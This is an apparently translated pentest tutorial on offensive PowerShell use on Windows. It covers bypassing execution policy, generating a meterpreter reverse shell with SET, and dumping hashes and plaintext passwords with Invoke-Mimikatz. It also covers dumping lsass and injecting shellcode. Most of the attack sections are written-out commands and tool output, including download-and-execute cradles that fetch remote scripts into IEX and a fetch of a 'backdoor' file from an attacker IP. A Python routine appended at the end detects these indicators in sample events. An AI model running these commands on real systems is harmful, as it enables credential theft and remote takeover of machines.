
Original article: http://drops.wooyun.org/tips/3353

0x00 Introduction to PowerShell


PowerShell is to Windows what bash is to Linux. On Windows it can draw on the full power of the .NET Framework and can also call the Windows API, and since Windows 7 / Server 2008 it has shipped as part of the operating system. The breadth of PowerShell's features makes Windows administration far more convenient, and it makes penetration testing on Windows more convenient as well.

0x01 PowerShell Execution Policy


By default a PowerShell script cannot be run by double-clicking it or from cmd; to run one, the execution policy has to be worked around. The simplest approach is to run powershell.exe with the command to execute appended, or to paste the script directly into the PowerShell window. Download-and-execute, as in the examples below, works as well.

If you need to run a .ps1 file, this also works:

            PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
            

Changing the execution policy globally by other means is not recommended; depending on the scenario, pick a suitable execution method from the references.

0x02 Reverse the Shell


When protective software is in the way, PowerShell can be used to run shellcode and return a shell. The script can be generated with msf or with the SET toolkit; note that msf produces a .ps1 file whereas SET produces a .bat file. The generation process in SET is shown below:

            Select from the menu:
            
               1) Social-Engineering Attacks
               2) Fast-Track Penetration Testing
               3) Third Party Modules
               4) Update the Metasploit Framework
               5) Update the Social-Engineer Toolkit
               6) Update SET configuration
               7) Help, Credits, and About
            
              99) Exit the Social-Engineer Toolkit
            
            set> 1
            
            ..SNIP...
            
             Select from the menu:
            
               1) Spear-Phishing Attack Vectors
               2) Website Attack Vectors
               3) Infectious Media Generator
               4) Create a Payload and Listener
               5) Mass Mailer Attack
               6) Arduino-Based Attack Vector
               7) SMS Spoofing Attack Vector
               8) Wireless Access Point Attack Vector
               9) QRCode Generator Attack Vector
              10) Powershell Attack Vectors
              11) Third Party Modules
            
              99) Return back to the main menu.
            
            set> 10
            
            The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.
            
               1) Powershell Alphanumeric Shellcode Injector
               2) Powershell Reverse Shell
               3) Powershell Bind Shell
               4) Powershell Dump SAM Database
            
              99) Return to Main Menu
            
            set:powershell>1
            set> IP address for the payload listener: 192.168.200.159
            set:powershell> Enter the port for the reverse [443]:4444
            [*] Prepping the payload for delivery and injecting alphanumeric shellcode...
            [*] Generating x86-based powershell injection code...
            [*] Finished generating powershell injection bypass.
            [*] Encoded to bypass execution restriction policy...
            [*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
            set> Do you want to start the listener now [yes/no]: : yes
            
            ..SNIP...
            
            [*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
            resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
            resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
            payload => windows/meterpreter/reverse_tcp
            resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444
            lport => 4444
            resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
            LHOST => 0.0.0.0
            resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
            [*] Exploit running as background job.
            msf exploit(handler) > 
            [*] Started reverse handler on 0.0.0.0:4444 
            [*] Starting the payload handler...
            [*] Sending stage (769024 bytes) to 192.168.200.158
            [*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800
            
            msf exploit(handler) > sessions 
            
            Active sessions
            ===============
            
              Id  Type                   Information                               Connection
              --  ----                   -----------                               ----------
              1   meterpreter x86/win32  WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2  192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)
            

The generated files are under /root/.set/reports/powershell/. Among them, x86_powershell_injection.txt is the bat file; rename it and it can be run directly. A useful trick here is a PowerShell one-liner that downloads a file directly:

            powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.200.159/backdoor','backdoor.bat')
            


Running it then yields a meterpreter session.


From there cmd commands, hash and plaintext credential dumping and so on all work normally.


0x03 Dump the hash


When only a hash dump is needed, PowerShell can handle that on its own.

            powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
            


0x04 Dump the plain Password


Plaintext credentials can likewise be obtained as follows (by running the PowerShell port of Mimikatz).

            powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCerts
            


Note that Mimikatz commands can also be passed here through the Command parameter.

0x05 Memory Dumping


PowerShell can also do the job of procdump and capture a dump of a given process. The demonstration here captures a dump of lsass.exe and then uses Mimikatz to recover plaintext credentials from it.


The lsass dump file is then downloaded and analysed with Mimikatz, which yields the plaintext passwords.


Memory dumps are not limited to Windows passwords; process memory often holds other important information or data. See http://blog.spiderlabs.com/2012/07/pentesting-like-an-eastern-european.html

0x06 Execute the shellcode


Because PowerShell's rich extensibility makes calling the Windows API very convenient, it can also run shellcode. The process is as follows:

            powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -help
            


There is a problem here, though: very little x64 shellcode exists, and shellcode collected from the internet is usually x86. Running x86 shellcode directly will fail.

However, Invoke-Shellcode.ps1 injects the shellcode into the powershell.exe process by default, so on a 64-bit system the 32-bit powershell.exe can be used to run x86 shellcode, as follows:

            c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90 ...
            


This process works for most shellcode generated by msfpayload. There are of course other ways to run shellcode on Windows, such as shellcodeexec, but that method does not bypass AV; with the source code available, readers can work out a bypass of their own.
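Every technique in sections 0x01 to 0x06 leaves a recognisable trace on the host: the -ExecutionPolicy Bypass flag, the WebClient download cradle fed into IEX, the SysWOW64 powershell.exe path and the names of the loaded modules all appear in process-creation command lines (event 4688) and PowerShell script block logs (event 4104). As an added example that is not part of the original article, the following Python triage routine matches those indicators over constructed sample events; the rule names, the sample event text and the severity scoring are my own.

```python
import re

# Constructed sample events (not real telemetry): (event_id, text), where 4688 is process-creation
# auditing with command-line logging and 4104 is PowerShell script block logging.
SAMPLE_EVENTS = [
    (4688, r"PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1"),
    (4688, "powershell (new-object System.Net.WebClient).DownloadFile("
           "'http://192.168.200.159/backdoor','backdoor.bat')"),
    (4104, "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/"
           "mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCerts"),
    (4688, r"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient)"
           r".DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/"
           r"CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90"),
    (4104, r"Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }"),  # benign admin activity
]

# Detection rules (names and patterns are my own), one per technique the article relies on.
RULES = {
    # -ExecutionPolicy Bypass and its accepted abbreviations on the powershell.exe command line
    "execution_policy_bypass": re.compile(r"-(?:executionpolicy|exec|ep)\s+bypass", re.I),
    # WebClient download cradle, whether the payload is saved (DownloadFile) or kept in memory
    "webclient_download": re.compile(r"net\.webclient\)\.download(?:string|file)", re.I),
    # Invoke-Expression over downloaded content: remote script executed without touching disk
    "iex_remote_code": re.compile(r"\b(?:iex|invoke-expression)\b.*download", re.I),
    # 32-bit PowerShell launched from SysWOW64 on a 64-bit host (used to run x86 shellcode)
    "syswow64_powershell": re.compile(r"\\syswow64\\windowspowershell\\", re.I),
    # Function names of the offensive modules the article loads
    "offensive_module_name": re.compile(r"invoke-mimikatz|invoke-shellcode|get-passhashes", re.I),
}

def scan_event(text):
    """Return the names of all rules that match one event's command or script text."""
    return [name for name, rx in RULES.items() if rx.search(text)]

def triage(events):
    """Return (event_id, severity, hits) per matching event: one indicator is 'medium' (a lone
    -ExecutionPolicy Bypass has legitimate uses); two or more, e.g. a cradle feeding IEX, are 'high'."""
    findings = []
    for event_id, text in events:
        hits = scan_event(text)
        if hits:
            findings.append((event_id, "high" if len(hits) >= 2 else "medium", hits))
    return findings

if __name__ == "__main__":
    for event_id, severity, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id} [{severity}]: {', '.join(hits)}")
```

Script block logging has to be enabled for 4104 events to exist at all, and the execution policy itself is not a security boundary, so the logs rather than the policy setting are what this check relies on.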

To be continued.
